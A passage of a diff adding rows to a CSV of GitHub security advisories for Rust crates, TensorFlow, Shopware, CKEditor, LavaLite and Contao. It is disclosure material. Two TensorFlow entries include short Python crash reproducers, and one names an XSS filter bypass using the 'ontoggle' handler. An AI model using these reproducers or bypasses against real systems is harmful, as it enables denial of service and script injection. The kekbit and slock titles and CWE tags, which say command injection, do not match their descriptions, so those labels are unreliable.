+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'max7301'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36472'}, {'type': 'WEB', 'url': 'https://github.com/edarc/max7301/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/edarc/max7301/commit/0a1da873ddb29bca926bad8301f8d7ab8aa97c52'}, {'type': 'PACKAGE', 'url': 'https://github.com/edarc/max7301'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0152.html'}]","{'cwe_ids': ['CWE-362'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-09T17:25:44Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
+1.4.0,GHSA-g83m-67wh-whpw,2021-08-18T20:31:24Z,2021-08-25T20:57:10Z,,['CVE-2020-36449'],Command injection in kekbit,"An issue was discovered in the kekbit crate before 0.3.4 for Rust. For ShmWriter, Send is implemented without requiring H: Send.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'kekbit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36449'}, {'type': 'WEB', 'url': 'https://github.com/motoras/kekbit/issues/34'}, {'type': 'PACKAGE', 'url': 'https://github.com/motoras/kekbit'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0129.html'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:31:24Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
+1.4.0,GHSA-mc36-5m36-hjh5,2021-08-18T20:21:54Z,2021-08-25T20:58:00Z,,['CVE-2020-36455'],Data races in slock,An issue was discovered in the slock crate through 2020-11-17 for Rust. Slock unconditionally implements Send and Sync.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'slock'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36455'}, {'type': 'WEB', 'url': 'https://github.com/BrokenLamp/slock-rs/issues/2'}, {'type': 'WEB', 'url': 'https://github.com/BrokenLamp/slock-rs/commit/719df35f55b6cab4ca2a7f840347a06ecbd8aac6'}, {'type': 'PACKAGE', 'url': 'https://github.com/BrokenLamp/slock-rs'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/slock/RUSTSEC-2020-0135.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0135.html'}]","{'cwe_ids': ['CWE-362', 'CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:21:54Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
+1.4.0,GHSA-rhrq-64mq-hf9h,2021-08-24T17:06:32Z,2021-08-25T14:40:16Z,,['CVE-2021-37683'],FPE in TFLite division operations,"### Impact
+The implementation of division in TFLite is [vulnerable to a division by 0 error](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/div.cc)
+
+There is no check that the divisor tensor does not contain zero elements.
+
+### Patches
+We have patched the issue in GitHub commit [1e206baedf8bef0334cca3eb92bab134ef525a28](https://github.com/tensorflow/tensorflow/commit/1e206baedf8bef0334cca3eb92bab134ef525a28).
+
+The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-rhrq-64mq-hf9h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37683'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/1e206baedf8bef0334cca3eb92bab134ef525a28'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T17:06:32Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}"
+1.4.0,GHSA-xh55-2fqp-p775,2021-08-26T19:40:02Z,2021-08-30T16:14:09Z,,['CVE-2021-37708'],Command injection in mail agent settings,"### Impact
+Command injection in mail agent settings
+
+### Patches
+We recommend updating to the current version 6.4.3.1. You can get the update to 6.4.3.1 regularly via the Auto-Updater or directly via the download overview.
+
+https://www.shopware.com/en/download/#shopware-6
+
+### Workarounds
+For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.
+
+https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.3.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.3.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-xh55-2fqp-p775'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37708'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/commit/82d8d1995f6ce9054323b2c3522b1b3cf04853aa'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-26T19:40:02Z', 'nvd_published_at': '2021-08-16T20:15:00Z'}"
+1.4.0,GHSA-c3cw-c387-pj65,2023-06-13T17:11:24Z,2021-08-25T20:43:21Z,,['CVE-2018-20996'],Double free in crossbeam,"Even if an element is popped from a queue, crossbeam would run its destructor inside the epoch-based garbage collector. This is a source of double frees.
+
+The flaw was corrected by wrapping elements inside queues in a ManuallyDrop.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'crossbeam'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.4.0'}, {'fixed': '0.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20996'}, {'type': 'WEB', 'url': 'https://github.com/crossbeam-rs/crossbeam-epoch/issues/82'}, {'type': 'PACKAGE', 'url': 'https://github.com/crossbeam-rs/crossbeam-epoch'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0009.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:34Z', 'nvd_published_at': None}"
+1.4.0,GHSA-jjx5-3f36-6927,2021-08-18T21:31:51Z,2021-08-25T20:55:47Z,,['CVE-2021-38188'],Incorrect buffer size calculation in iced-x86,"An issue was discovered in the iced-x86 crate through 1.10.3 for Rust. In Decoder::new(), slice.get_unchecked(slice.length()) is used unsafely.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'iced-x86'}, 'ecosystem_specific': {'affected_functions': ['iced_x86::Decoder::new']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-38188'}, {'type': 'WEB', 'url': 'https://github.com/icedland/iced/issues/168'}, {'type': 'WEB', 'url': 'https://github.com/icedland/iced/commit/3c607a003e03b773108401d109167d1840487dce'}, {'type': 'PACKAGE', 'url': 'https://github.com/icedland/iced'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0068.html'}]","{'cwe_ids': ['CWE-131'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:31:51Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
+1.4.0,GHSA-rw2c-c256-3r53,2023-06-13T18:08:34Z,2021-08-25T20:51:52Z,,['CVE-2020-36215'],Data races in hashconsing,Affected versions of hashconsing implements Send/Sync for its HConsed type without restricting it to Sendable types and Syncable types. This allows non-Sync types such as Cell to be shared across threads leading to undefined behavior and memory corruption in concurrent programs.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'hashconsing'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36215'}, {'type': 'WEB', 'url': 'https://github.com/AdrienChampion/hashconsing/issues/1'}, {'type': 'PACKAGE', 'url': 'https://github.com/AdrienChampion/hashconsing'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0107.html'}]","{'cwe_ids': ['CWE-662', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:47:26Z', 'nvd_published_at': '2021-01-26T18:15:00Z'}"
+1.4.0,GHSA-hwr7-8gxx-fj5p,2021-08-23T18:10:19Z,2021-08-25T14:44:09Z,,['CVE-2021-37638'],Null pointer dereference in `RaggedTensorToTensor`,"### Impact
+Sending invalid argument for `row_partition_types` of `tf.raw_ops.RaggedTensorToTensor` API results in a null pointer dereference and undefined behavior:
+
+```python
+import tensorflow as tf
+
+tf.raw_ops.RaggedTensorToTensor(
+ shape=1,
+ values=10,
+ default_value=21,
+ row_partition_tensors=tf.constant([0,0,0,0]),
+ row_partition_types=[])
+```
+
+The [implementation](https://github.com/tensorflow/tensorflow/blob/47a06f40411a69c99f381495f490536972152ac0/tensorflow/core/kernels/ragged_tensor_to_tensor_op.cc#L328) accesses the first element of a user supplied list of values without validating that the provided list is not empty.
+
+### Patches
+We have patched the issue in GitHub commit [301ae88b331d37a2a16159b65b255f4f9eb39314](https://github.com/tensorflow/tensorflow/commit/301ae88b331d37a2a16159b65b255f4f9eb39314).
+
+The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-hwr7-8gxx-fj5p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37638'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/301ae88b331d37a2a16159b65b255f4f9eb39314'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:10:19Z', 'nvd_published_at': '2021-08-12T19:15:00Z'}"
+1.4.0,GHSA-2367-c296-3mp2,2023-06-13T21:53:47Z,2021-08-25T20:43:54Z,,['CVE-2018-20990'],Arbitrary file overwrite in tar-rs,"When unpacking a tarball with the unpack_in-family of functions it's intended that only files within the specified directory are able to be written. Tarballs with hard links or symlinks, however, can be used to overwrite any file on the filesystem. Tarballs can contain multiple entries for the same file. A tarball which first contains an entry for a hard link or symlink pointing to any file on the filesystem will have the link created, and then afterwards if the same file is listed in the tarball the hard link will be rewritten and any file can be rewritten on the filesystem.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'tar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2018-20990'}, {'type': 'WEB', 'url': 'https://github.com/alexcrichton/tar-rs/pull/156'}, {'type': 'WEB', 'url': 'https://github.com/alexcrichton/tar-rs/commit/54651a87ae6ba7d81fcc72ffdee2ea7eca2c7e85'}, {'type': 'PACKAGE', 'url': 'https://github.com/alexcrichton/tar-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2018-0002.html'}]","{'cwe_ids': ['CWE-59'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:24:12Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m94c-37g6-cjhc,2022-02-08T21:01:39Z,2021-08-23T19:42:15Z,,['CVE-2021-37695'],Fake objects feature vulnerability allowing to execute JavaScript code using malformed HTML.,"### Affected packages
+The vulnerability has been discovered in [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects) plugin. All plugins with [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects) plugin dependency are affected:
+
+* [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects)
+* [Link](https://ckeditor.com/cke4/addon/link)
+* [Flash](https://ckeditor.com/cke4/addon/flash)
+* [Iframe](https://ckeditor.com/cke4/addon/iframe)
+* [Forms](https://ckeditor.com/cke4/addon/forms)
+* [Page Break](https://ckeditor.com/cke4/addon/pagebreak)
+
+### Impact
+A potential vulnerability has been discovered in CKEditor 4 [Fake Objects](https://ckeditor.com/cke4/addon/fakeobjects) package. The vulnerability allowed to inject malformed Fake Objects HTML, which could result in executing JavaScript code. It affects all users using the CKEditor 4 plugins listed above at version < 4.16.2.
+
+### Patches
+The problem has been recognized and patched. The fix will be available in version 4.16.2.
+
+### For more information
+Email us at security@cksource.com if you have any questions or comments about this advisory.
+
+### Acknowledgements
+The CKEditor 4 team would like to thank Mika Kulmala ([kulmik](https://github.com/kulmik)) for recognizing and reporting this vulnerability.
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ckeditor4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.16.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/security/advisories/GHSA-m94c-37g6-cjhc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37695'}, {'type': 'WEB', 'url': 'https://github.com/ckeditor/ckeditor4/commit/de3c001540715f9c3801aaa38a1917de46cfcf58'}, {'type': 'PACKAGE', 'url': 'https://github.com/ckeditor/ckeditor4'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/11/msg00007.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVOYN2WKDPLKCNILIGEZM236ABQASLGW/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAGNWHFIQAVCP537KFFS2A2GDG66J7XD/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T17:15:12Z', 'nvd_published_at': '2021-08-13T00:15:00Z'}"
+1.4.0,GHSA-cv7x-6rc6-pq5v,2023-06-13T17:00:36Z,2021-08-25T20:53:05Z,,['CVE-2021-25907'],Double free in containers,"Upon panic in a user-provided function f, fn mutate() & fn mutate2 drops twice a same object.
+
+Affected versions of this crate did not guard against double drop while temporarily duplicating an object's ownership with ptr::read().
+
+Dropping a same object can result in memory corruption.
+
+The flaw was corrected in version ""0.9.11"" by fixing the code to abort upon panic.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'containers'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25907'}, {'type': 'WEB', 'url': 'https://github.com/strake/containers.rs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/strake/containers.rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2021-0010.html'}]","{'cwe_ids': ['CWE-415'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:40:39Z', 'nvd_published_at': None}"
+1.4.0,GHSA-v2f3-f8x4-m3w8,2023-07-06T21:32:19Z,2021-08-09T20:38:54Z,,['CVE-2020-23234'],Cross Site Scripting in LavaLite CMS,"Cross Site Scripting (XSS) vulnerabiity exists in LavaLite CMS 5.8.0 via the Menu Blocks feature, which can be bypassed by using HTML event handlers, such as ""ontoggle,"".","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'lavalite/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-23234'}, {'type': 'WEB', 'url': 'https://github.com/LavaLite/cms/issues/320'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-02T21:50:55Z', 'nvd_published_at': '2021-07-26T20:15:00Z'}"
+1.4.0,GHSA-xp6v-qx65-4pp7,2023-06-13T18:10:24Z,2021-08-25T20:50:39Z,,['CVE-2020-36211'],Data races in gfwx,"In the affected versions of this crate, ImageChunkMut<'_, T> unconditionally implements Send and Sync, allowing to create data races.
+
+This can result in a memory corruption or undefined behavior when non thread-safe types are moved and referenced across thread boundaries.
+
+The flaw was corrected in commit e7fb2f5 by adding T: Send bound to the Send impl and adding T: Sync bound to the Sync impl.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'gfwx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36211'}, {'type': 'WEB', 'url': 'https://github.com/Devolutions/gfwx-rs/issues/7'}, {'type': 'PACKAGE', 'url': 'https://github.com/Devolutions/gfwx-rs'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0104.html'}]","{'cwe_ids': ['CWE-662', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:53:42Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3358-4f7f-p4j4,2021-08-18T21:16:25Z,2021-08-25T20:56:12Z,,['CVE-2020-36465'],Use after free in generic-array,An issue was discovered in the generic-array crate before 0.13.3 for Rust. It violates soundness by using the arr! macro to extend lifetimes.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'generic-array'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.13.0'}, {'fixed': '0.13.3'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'generic-array'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.12.0'}, {'fixed': '0.12.4'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'generic-array'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.11.0'}, {'fixed': '0.11.2'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'generic-array'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.10.0'}, {'fixed': '0.10.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'generic-array'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.8.0'}, {'fixed': '0.9.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36465'}, {'type': 'WEB', 'url': 'https://github.com/fizyk20/generic-array/issues/98'}, {'type': 'PACKAGE', 'url': 'https://github.com/fizyk20/generic-array'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0146.html'}]","{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T21:16:25Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}"
+1.4.0,GHSA-w4xf-2pqw-5mq7,2021-08-24T13:57:28Z,2021-08-25T14:42:13Z,,['CVE-2021-37666'],Reference binding to nullptr in `RaggedTensorToVariant`,"### Impact
+An attacker can cause undefined behavior via binding a reference to null pointer in `tf.raw_ops.RaggedTensorToVariant`:
+
+```python
+import tensorflow as tf
+
+tf.raw_ops.RaggedTensorToVariant(
+ rt_nested_splits=[],
+ rt_dense_values=[1,2,3],
+ batched_input=True)
+```
+
+The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/ragged_tensor_to_variant_op.cc#L129) has an incomplete validation of the splits values, missing the case when the argument would be empty.
+
+### Patches
+We have patched the issue in GitHub commit [be7a4de6adfbd303ce08be4332554dff70362612](https://github.com/tensorflow/tensorflow/commit/be7a4de6adfbd303ce08be4332554dff70362612).
+
+The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-w4xf-2pqw-5mq7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37666'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/be7a4de6adfbd303ce08be4332554dff70362612'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-824'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T13:57:28Z', 'nvd_published_at': '2021-08-12T22:15:00Z'}"
+1.4.0,GHSA-hr3h-x6gq-rqcp,2023-04-25T16:32:31Z,2021-08-25T14:45:01Z,,['CVE-2021-35955'],Cross site scripting via HTML attributes in the back end,"### Impact
+
+It is possible for untrusted users to inject malicious code into HTML attributes in the back end, which will be executed both in the element preview (back end) and on the website (front end).
+
+Installations are only affected if there are untrusted back end users who have the rights to modify HTML fields (e.g. TinyMCE).
+
+### Patches
+
+Update to Contao 4.4.56, 4.9.18 or 4.11.7
+
+### Workarounds
+
+Disable all fields that allow HTML for untrusted back end users or disable the login for these users.
+
+### References
+
